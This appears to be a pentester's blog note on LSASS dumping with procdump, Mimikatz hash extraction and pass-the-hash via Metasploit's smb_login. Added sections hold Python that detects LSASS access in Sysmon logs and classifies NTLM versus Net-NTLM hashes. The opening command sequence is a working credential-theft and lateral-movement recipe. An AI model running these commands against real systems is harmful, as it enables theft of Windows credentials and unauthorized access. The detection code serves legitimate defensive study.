
Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

Username : {user}
Domain   : {domain}
NTLM     : {NTLM Hash}

use auxiliary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run
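Defender-side counterpart to the lsass dump step above, added here and not part of the original post: a small Python routine that flags processes opening a handle to lsass.exe with memory-read rights in Sysmon Event ID 10 (ProcessAccess) records. The field names are Sysmon's; the flattened "key=value; key=value" export format, the allowlist and every sample line are constructed assumptions for this example.

```python
import re

# Sysmon Event ID 10 (ProcessAccess) is logged when one process opens a handle
# to another. Writing a memory dump of lsass.exe (the procdump step above) needs
# at least PROCESS_QUERY_INFORMATION | PROCESS_VM_READ on the target.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
DUMP_MASK = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Example allowlist of processes expected to read LSASS memory. Assumption:
# illustrative only, it must be tuned to what is normal in your environment.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed sample records flattened to one "key=value; key=value" line each.
# Field names are Sysmon's; paths, access masks and call traces are made up.
SAMPLE_EVENTS = [
    r"EventID=10; SourceImage=C:\Windows\System32\csrss.exe; TargetImage=C:\Windows\System32\lsass.exe; GrantedAccess=0x1FFFFF; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d2e4",
    r"EventID=10; SourceImage=C:\Users\alice\Downloads\procdump64.exe; TargetImage=C:\Windows\System32\lsass.exe; GrantedAccess=0x1FFFFF; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d2e4|C:\Users\alice\Downloads\procdump64.exe+1ab2c",
    r"EventID=10; SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe; TargetImage=C:\Windows\System32\lsass.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d2e4",
    r"EventID=10; SourceImage=C:\Windows\Temp\svc.exe; TargetImage=C:\Windows\System32\svchost.exe; GrantedAccess=0x1FFFFF; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d2e4",
]

FIELD_RE = re.compile(r"(\w+)=([^;]*)")


def parse_event(line):
    """Turn a flattened 'key=value; key=value' record into a dict."""
    return {key: value.strip() for key, value in FIELD_RE.findall(line)}


def is_suspicious_lsass_access(event):
    """True when a non-allowlisted process opened lsass.exe with dump-capable rights."""
    if event.get("EventID") != "10":
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)
    # Handles without both VM_READ and QUERY_INFORMATION cannot produce a minidump.
    if (granted & DUMP_MASK) != DUMP_MASK:
        return False
    return event.get("SourceImage", "").lower() not in ALLOWED_SOURCES


def find_lsass_dumpers(lines):
    """Return the SourceImage of every suspicious LSASS access in the input lines."""
    return [ev["SourceImage"] for ev in map(parse_event, lines)
            if is_suspicious_lsass_access(ev)]


if __name__ == "__main__":
    for image in find_lsass_dumpers(SAMPLE_EVENTS):
        print("suspicious LSASS access by", image)
```

Matching on the access mask rather than on the tool name is deliberate: renaming procdump.exe defeats an image-name rule, but a dump still needs read access to LSASS memory. The allowlist is where the false positives live (AV engines, EDR agents, csrss), so it has to be derived from a baseline of your own hosts.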

good blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

When you can & cannot Pass the Hash

great blog

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

From a pentesting perspective:
  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.
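Added example, not part of the quoted post or its author's code: a small Python classifier that tells the two hash families apart by their textual format, so an incident responder looking at a finding can see at a glance whether it is a directly reusable NTLM hash (NT or LM:NT, as in the smb_login step above) or a Net-NTLMv1/v2 challenge-response capture. The capture line layouts follow the Responder/Inveigh conventions (hashcat modes 5500 and 5600); all sample values are constructed.

```python
import re

# LM hash of the empty password. Modern Windows does not store LM hashes, so
# dumped credentials carry this constant in the LM position, which is why the
# SMBPass value above is "aad3b435b51404eeaad3b435b51404ee:<NT hash>".
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

HEX = "[0-9a-fA-F]"
NT_ONLY_RE = re.compile(rf"^{HEX}{{32}}$")
LM_NT_RE = re.compile(rf"^({HEX}{{32}}):({HEX}{{32}})$")
# Net-NTLMv2 capture as written by Responder/Inveigh (hashcat mode 5600):
# user::domain:server_challenge(16 hex):NTProofStr(32 hex):blob(hex)
NETNTLMV2_RE = re.compile(rf"^[^:]+::[^:]*:{HEX}{{16}}:{HEX}{{32}}:{HEX}+$")
# Net-NTLMv1 capture (hashcat mode 5500):
# user::domain:LM_response(48 hex):NT_response(48 hex):server_challenge(16 hex)
NETNTLMV1_RE = re.compile(rf"^[^:]+::[^:]*:{HEX}{{48}}:{HEX}{{48}}:{HEX}{{16}}$")

# Constructed samples; none of these values come from a real system.
SAMPLE_ARTIFACTS = [
    "0123456789abcdef0123456789abcdef",                                   # NT hash only (Mimikatz style)
    "aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef",  # LM:NT pair (SAM/NTDS style)
    "alice::CORP:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000ffeeddccbbaa99887766554433221100",
    "bob::CORP:" + "ab" * 24 + ":" + "cd" * 24 + ":1122334455667788",
]


def classify(artifact):
    """Return (kind, usable_for_pass_the_hash) for one dumped or captured string.

    NTLM hashes are password-equivalent and can be replayed; Net-NTLM captures
    are bound to a server challenge and cannot be passed, only relayed or cracked.
    """
    s = artifact.strip()
    if NT_ONLY_RE.match(s):
        return "NT hash", True
    m = LM_NT_RE.match(s)
    if m:
        if m.group(1).lower() == EMPTY_LM_HASH:
            return "LM:NT hash pair (LM empty)", True
        return "LM:NT hash pair", True
    if NETNTLMV2_RE.match(s):
        return "Net-NTLMv2 challenge-response", False
    if NETNTLMV1_RE.match(s):
        return "Net-NTLMv1 challenge-response", False
    return "unknown", False


def triage(artifacts):
    """Classify a list of artifacts, e.g. lines pasted from a finding."""
    return [classify(a) for a in artifacts]


if __name__ == "__main__":
    for artifact, (kind, usable) in zip(SAMPLE_ARTIFACTS, triage(SAMPLE_ARTIFACTS)):
        print(f"{kind:32} pass-the-hash={usable}  {artifact[:40]}...")
```

The distinguishing feature is structural: an NTLM hash is 32 hex characters (optionally prefixed by the 32-character LM hash), while a Net-NTLM capture always carries a username, a domain and a 16-hex-character server challenge, which is exactly what makes it single-use.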